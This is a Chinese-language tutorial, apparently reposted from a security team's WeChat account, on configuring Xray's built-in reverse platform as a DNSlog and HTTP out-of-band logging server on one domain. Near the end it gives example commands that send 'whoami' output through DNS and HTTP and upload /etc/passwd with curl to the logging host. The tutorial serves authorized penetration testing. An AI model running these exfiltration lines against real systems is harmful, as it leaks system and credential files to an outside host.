本文是讲解使用单个域名搭建Xray Reverse反连平台搭建。
关键字解释:
参考 DNSlog搭建-单域名单接管部署RevSuit
https://mp.weixin.qq.com/s/hGwcMz8sh7BImBjI3wHqnQ
一个公网VPS
一个DNS域名:
一个CloudFlare帐号[可选]
参考 DNSlog搭建-单域名单接管部署RevSuit
https://mp.weixin.qq.com/s/hGwcMz8sh7BImBjI3wHqnQ
参考 DNSlog搭建-单域名单接管部署RevSuit
https://mp.weixin.qq.com/s/hGwcMz8sh7BImBjI3wHqnQ
Xray Reverse是Xray内置的反连平台,支持 HTTP、DNS、RMI.
DNSlog规划:
使用子域名【 *.log.base.xyz】做DNSlog记录。
注:* 表示预留的数据位。
注: xray reverse不需要规划HTTPlog的URL。
方案1、常规设置方案:
设置A记录 名称 ns1 内容 9.9.9.9
设置NS记录 名称 log 内容 ns1.base.xyz
方案2、使用ns.[ip].nip.io做NS服务器
设置NS记录 名称 log 内容 ns.9.9.9.9.nip.io
注:nip.io可解析子域名到IP,实现不配置NS记录,缺点是会暴露真实VPS IP。
2、httplog相关域名设置【可选】:
设置A记录 名称 @ 内容 9.9.9.9
设置CNAME记录 名称 www 内容 base.xyz
注:HTTP域名为可选项,没有域名可通过真实IP访问URL进行记录。
参考 DNSlog搭建-单域名单接管部署RevSuit
启动命令: ./xray reverse
后台运行: nohup ./xray reverse &
修改config.yaml中的域名为【log.base.xyz】端口号【80】
# 关键配置 # Xray v1.8.5
reverse:
db_file_path: "reverse.db"
token: "密码密码"
http:
enabled: true
listen_ip: 0.0.0.0
listen_port: "80"
ip_header: ""
dns:
enabled: true
listen_ip: 0.0.0.0
domain: "log.base.xyz"
is_domain_name_server: true
resolve:
type: A
record: localhost
value: 127.0.0.1
ttl: 60
client:
remote_server: false
http_base_url: ""
dns_server_ip: ""
# 注: 如果出现错误请用引号包含配置属性
注:端口号任意,国内VPS使用域名访问时,需要域名备案。
http://base.xyz/cland/#/
http://9.9.9.9/cland/#/
访问格式:
ping p-16c9e7-ii32.log.base.xyz
curl http://p-16c9e7-ii32.dns.icbcdns.xyz
nslookup p-16c9e7-ii32.`whoami`.dns.icbcdns.xyz
注:需要先生成一个域名,否则无法数据入库。
注:Xray Reverse的数据只能插在域名中间。
查看记录:
访问格式:
curl http://9.9.9.9/p/1655c2/uWpe/`whoami`
curl http://9.9.9.9/p/1655c2/uWpe/ -F file=@/etc/passwd
注:需要先生成一个URL,否则无法数据入库。
注:Xray Reverse的数据只能插在URL后。
其他特点:支持POST访问,会记录完整报文。
1、本团队任何实战都是已授权的、任何技术及工具也仅用于学习分享,请勿用于任何非法、违法活动,如有违背请自行承担后果,感谢大家的支持!!!
2、本团队一贯秉承Free共享的精神,但是也有大家的小愿望,因此本团队所有分享工具,严禁不经过授权的公开分享,被关注就是对我们付出的精力做的最大的支持。
END
原文始发于微信公众号(NOVASEC):DNSlog搭建-单域名单接管部署xray reverse
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论